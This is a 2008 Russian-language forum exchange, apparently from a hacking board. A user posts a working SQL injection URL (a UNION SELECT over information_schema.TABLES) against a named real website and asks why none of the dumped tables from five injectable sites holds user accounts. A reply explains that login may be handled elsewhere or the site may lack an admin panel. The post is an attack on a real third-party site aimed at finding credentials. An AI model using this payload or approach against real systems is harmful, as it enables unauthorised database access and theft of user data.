01.09.2008, 22:09
|
|
Новичок
Регистрация: 24.07.2008
Сообщений: 29
Провел на форуме:
109513
Репутация:
52
|
|
Сообщение от zjuk@
всем привет,
в очередной раз наткнулся на такую неприятность, когда из 5 sql удалось выцепить все таблицы, но не одна из них не является таблицей с пользователями (все колонки в каждой просматрел) такое вообще возможно? И как с этим бороться?
Вот пример
_http://www.semenovsky.ru/?pageId=3&mode=cards&Id=-1+union+select+1,TABLE_NAME,3,4,5,6,7,8,9,10,11,12 ,13,14,15+from+information_schema.TABLES++limit+16 ,200--
Заранее благодарен
такое вполне возможно,ничего такого тут нет,авторизация происходит значит по другому...
или на сайте вообще нет админки,что тоже вполне нормально для небольших проектов...
если я не прав,то поправьте)
|
|
|